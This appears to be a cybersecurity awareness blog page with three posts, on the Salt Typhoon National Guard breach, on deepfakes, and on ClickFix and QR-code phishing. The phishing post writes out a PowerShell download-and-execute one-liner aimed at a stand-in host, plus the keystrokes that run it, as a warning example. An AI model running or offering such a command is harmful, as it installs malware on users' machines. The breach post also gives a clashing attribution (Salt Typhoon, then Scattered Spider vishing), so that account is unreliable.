cybersecurity - Horizon Helix

Chinese Hackers Infiltrate U.S. National Guard Networks for Nine Months: The Salt Typhoon Breach

Anthony Duran on July 17, 2025

In March 2024, Chinese state-backed hackers known as “Salt Typhoon” began what would become a nine-month infiltration of a U.S. state’s Army National Guard network. This wasn’t a smash-and-grab operation targeting consumer data—it was a sophisticated intelligence gathering campaign that extracted network configurations, administrative credentials, and operational maps spanning all 50 states and four U.S. territories. The breach, which remained undetected until December 2024, represents one of the most strategically significant cyber espionage operations against American military infrastructure in recent memory.

The Breach: What We Know

Between March and December 2024, Chinese state-backed hackers known as Salt Typhoon “extensively compromised” that state’s National Guard network .

They exfiltrated:

- Network maps & traffic data spanning every U.S. state + 4 territories

- Administrator credentials and internal network diagrams

No immediate details on which state were confirmed, but the leak to Property of the People sparked nationwide alarm .

How It Happened: A People-Powered Breach

This wasn’t a brute-force hack it was a classic case of social engineering. Attackers employed a technique known as vishing, targeting contact center staff via phone to extract credentials and bypass multi-factor authentication.

The culprits? Likely the notorious Scattered Spider group known for sophisticated, human-focused attacks across airlines and payment systems.

Why It Matters to Every Business

This wasn’t just espionage, it’s a strategic pre-positioning aimed at sabotaging critical infrastructure should tensions escalate . But the real threat for organizations lies closer to home:

National Guard units often interface with fusion centers, which manage local threat intelligence. A compromised node here weakens our collective response capabilities.

A former Air National Guard CIO stated:

“Going forward, all U.S. forces must now assume their networks are compromised and will be degraded.” 

Salt Typhoon: More Than a Hacker

This cyber-threat actor has rapidly become one of China’s most persistent and dangerous digital weapons. In 2024 alone, Chinese-linked breach activity doubled . Salt Typhoon is part of a broader ecosystem – (including “Volt Typhoon” and “Silk Typhoon” – well-equipped to exploit zero-day vulnerabilities in software, telecom infrastructure, and defense systems .

What This Reveals: National Security at Risk

Strategic Intelligence: Topological and network insights are a roadmap for future cyber or physical attacks.

Systemic Risk: Gaps in National Guard security don’t stay local—they threaten every business that works with state-level agencies or handles sensitive data.

Corporate Exposure: If government entities are breached, those of us relying on them, through third-party platforms, shared infrastructure, or supply chains—must question our digital trustworthiness.

What Businesses Can Do Now

Best Practice

Validate all vendors and partners

Assume compromise

Train employees continuously

Segment & limit access

Stay aware

Action

Ensure they follow cybersecurity frameworks like CISA or NIST

Monitor administrative logins, shadow IT, and unexpected IAM changes

Mandated “vishing” simulations for front-desk, customer service, and IT

Enforce least privilege and zero-trust across your network

Watch breach reporting and monitor dark-web forums for stolen data

The breach of a National Guard unit isn’t just national news, it’s proof that no network is truly secure, and that even “trusted” public systems can be painfully fragile. Business leaders must shift from reactive defense to proactive resilience, safeguarding every link in their digital chain.

If Army Guard networks can be quietly infiltrated for nine months, are your systems next?

The Deepfake Dilemma: Rising Threats and How to Stay Protected

Anthony Duran on April 29, 2025

Deepfakes, AI-generated audio, video, or images designed to mimic real people, have quickly evolved from experimental curiosities into dangerous tools for deception. As technology continues to advance, so does the ability for malicious actors to weaponize deepfakes for fraud, misinformation, and personal attacks. In 2025, the deepfake landscape presents serious challenges across personal, professional, and political arenas.

How Deepfakes are Made

Deepfakes are created using artificial intelligence, specifically deep learning models like autoencoders or generative adversarial networks (GANs). The process starts by training these models on large datasets of photos and videos of a person, allowing the AI to learn facial expressions, movements, and voice patterns. Once trained, the model can generate realistic but fake content by swapping faces in videos or mimicking voices. After the initial creation, post-processing techniques help enhance realism, such as smoothing artifacts (noticeable errors like 4 or 6 fingers or unnatural twitches) and syncing lip movements. Common software used to make deepfakes includes DeepFaceLab, Faceswap, Avatarify, and voice cloning tools like Descript’s Overdub. While these tools can be used creatively in entertainment or education, they also raise serious concerns around misinformation and impersonation.

This is an example of a deepfake side by side comparison.

The Growing Impact of Deepfakes

Victims of deepfakes, particularly women and minors,* are increasingly targeted with explicit or defamatory content. These fabricated videos can cause severe emotional distress, social stigma, and career harm, even when the content is proven false. Criminals are also using deepfakes to impersonate executives and trick employees into transferring money or divulging sensitive information. A commonly known deepfake scam happened last year as criminals exploited a company approximately $25 million USD.

*Read more about why women and minors are targeted more than other demographics.

Video conferencing tools and voice messaging platforms are now common channels for these scams, which can cause massive financial losses. In the political sphere, deepfakes of public figures are being used to spread false narratives and incite unrest. As these videos go viral on social media, they erode public trust, manipulate public opinion, and undermine democratic processes.

Protecting Against Deepfake Threats

To protect against these threats, it is important to verify content before sharing. One quick way to check is looking at the URL. Authenticity should never be assumed. Always check for inconsistencies in movement, lighting, or speech patterns and cross-reference information with trusted news outlets or official sources. AI-powered detection tools can also be used to identify deepfakes, analyzing digital fingerprints, facial patterns, and audio signals for manipulation. Limiting personal exposure online is another effective measure. Reducing the availability of personal photos, videos, and voice recordings by adjusting privacy settings can help limit the data that deepfake creators rely on.

It is important to understand the legal tools that are available as more states are introducing legislation to combat deepfakes. In an effort to defend against deepfakes, New Jersey passed legislation in April 2025 against “deceptive media made with artificial intelligence”. This is not long after California’s AB2655, which helps defend against deepfak es in the political setting.

Moving Forward in the Deepfake Era

Deepfakes will continue to improve in quality and accessibility, making detection and prevention more difficult. A combination of legal protections, public awareness, and evolving technology will be essential in managing this growing threat. Digital literacy and critical thinking are more important than ever. Understanding how deepfakes are made and used can empower individuals and organizations to better protect themselves and others from the harm they may cause.

The Rise of Advanced Phishing Scams and How to Stay Safe

Anthony Duran on March 21, 2025

Phishing attacks continue to evolve as cybercriminals develop new techniques to deceive users and steal sensitive information. One emerging method is ClickFix, a social engineering tactic that tricks users into executing malicious commands by disguising them as legitimate actions, such as CAPTCHA verifications or system fixes. Attackers use phishing emails and malicious ads to direct victims to deceptive websites, where clipboard manipulation convinces a victim to copy a command that runs a malicious script, often using built-in system tools like PowerShell or Command Prompt, to download and execute malware, steal credentials, or establish persistent access. Recent campaigns have used ClickFix to distribute malware like Lumma Stealer, DarkGate, and remote access trojans.

Another growing phishing scam is the QR code phishing attack, often referred to as “Quishing” Cybercriminals embed QR codes in phishing emails, pretending to be from trusted sources like banks, delivery services, or corporate IT departments. When users scan these QR codes with their smartphones, they are redirected to fake login pages that steal their credentials. Since mobile devices do not always display full URLs, users may not realize they are on a malicious site until their information has already been compromised.

How to Stay Safe

With phishing attacks becoming more sophisticated, it is essential to take proactive steps to protect yourself and your organization. Here are a few recommendations:

- Always verify the source of an email before clicking on links or scanning QR codes. If something seems suspicious, contact the sender through official channels. This can be done through emailing the person or service directly asking for confirmation or through another trusted form of communication, before acting.

- Do not run commands provided by unknown sources, even if they appear to be part of a system fix or security verification. For example:
  powershell -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString(‘http://malicious.com/script.ps1’)”
  could be inserted through three steps
  
  1. ⊞ +R
  2. CTRL+V
  3. Enter

- Enable multi-factor authentication (MFA) on all accounts to add an extra layer of security against credential theft. Check out our guide on setting up 2FA (Two-Factor Authentication) for various email services.

- Keep software and security tools updated to detect and block phishing attempts before they cause harm.

- Educate employees and team members about common phishing tactics to reduce the risk of falling for social engineering scams.

By staying informed and vigilant, individuals and businesses can significantly reduce the likelihood of becoming victims of phishing scams. The most effective way to avoid a scam is to ask yourself three questions, Is this urgent? Is this unexpected? Is this too good to be true? These three questions will help save you time and stress from being a victim of a scam.